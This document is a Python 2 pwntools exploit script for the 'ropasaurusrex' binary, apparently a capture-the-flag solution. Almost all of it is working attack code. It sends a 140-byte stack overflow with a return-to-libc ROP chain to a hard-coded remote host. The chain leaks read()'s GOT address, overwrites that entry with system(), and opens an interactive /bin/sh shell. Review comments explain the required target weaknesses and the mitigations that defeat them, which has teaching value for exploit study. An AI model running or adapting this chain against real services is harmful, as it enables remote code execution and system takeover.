Ropasaurusrex
from pwn import *
from time import *
# Return-to-libc ROP chain against a 32-bit binary, in three phases:
#   1. plant the string "/bin/sh" at a fixed writable address,
#   2. leak the run-time address of read() from its GOT slot to compute the libc base,
#   3. overwrite that GOT slot with system() and call through the PLT stub again.
#
# NOTE(review): the script depends on the following target properties (inferred from the
# hard-coded values below, not shown on this page; confirm against the binary):
#   - fixed load address (non-PIE), so PLT/GOT/gadget addresses are constants;
#   - no stack canary between the buffer and the saved return address;
#   - a GOT that is still writable at run time (no full RELRO);
#   - knowledge of the exact libc build (offset_read / offset_system).
# Enabling PIE, stack protectors and full RELRO (-z relro -z now) removes these assumptions.
#
# NOTE(review): Python 2 only. It uses print statements and concatenates str with p32() output.
s = remote("52.79.124.141",44444)

# Fixed addresses inside the target binary (presumably taken from its PLT/GOT; verify).
read_plt = 0x804832c       # PLT stub for read()
write_plt = 0x804830c      # PLT stub for write()
read_got = 0x0804961c      # GOT slot that holds the resolved address of read()
pppr = 0x80484b6           # presumably a pop/pop/pop/ret gadget: discards 3 args, then returns into the next link

bin_sh = "/bin/sh\x00"     # NUL-terminated command string, 8 bytes
bin_sh_addr = 0x08049530   # presumably a writable fixed address in the binary, used as scratch space

# Offsets of read() and system() from the libc base. These are specific to one libc build;
# with a different libc the computed system() address is wrong.
offset_read = 0x000d5c00
offset_system = 0x0003ad80

# 140 bytes of filler; the next 4 bytes land on the saved return address (assumed layout).
junk = "A" * 140
payload = junk

# Link 1: read(0, bin_sh_addr, len(bin_sh)) stores the "/bin/sh" string sent later.
# cdecl stack layout per link: [function][return address][arg1][arg2][arg3]
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bin_sh_addr)
payload += p32(len(bin_sh))

# Link 2: write(1, read_got, 4) sends the resolved read() address back to the client.
payload += p32(write_plt)
payload += p32(pppr) # return address: clean up the 3 args and continue the chain
payload += p32(1) # fd 1 = stdout
payload += p32(read_got)
payload += p32(4) # one 32-bit pointer

# Link 3: read(0, read_got, 4) replaces the GOT entry with the 4 bytes sent last.
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

# Link 4: call the read() PLT stub again. Its GOT slot now holds system(), so this
# becomes system(bin_sh_addr). "BBBB" is a dummy return address.
payload += p32(read_plt)
payload += "BBBB"
payload += p32(bin_sh_addr)

# Commented-out local variant (spawn the binary instead of connecting to the remote).
#s = process(_bin)
s.sendline(payload)
# Pause between sends; presumably so each blob is consumed by its own read() call.
sleep(1)
s.send(bin_sh)             # consumed by link 1

# Output of link 2: the 4-byte little-endian address of read() in libc.
# NOTE(review): recv(4) may return fewer than 4 bytes on a stream socket, and u32() then fails.
libc_read = u32(s.recv(4))
libc_base = libc_read - offset_read
libc_system = libc_base + offset_system
print '[+] read libc :', hex(libc_read)
print '[+] libc_base : ', hex(libc_base)
print '[+] system libc :', hex(libc_system)
sleep(1)
s.send(p32(libc_system))   # consumed by link 3: overwrites the read() GOT slot
s.interactive()            # hand the connection over to the terminal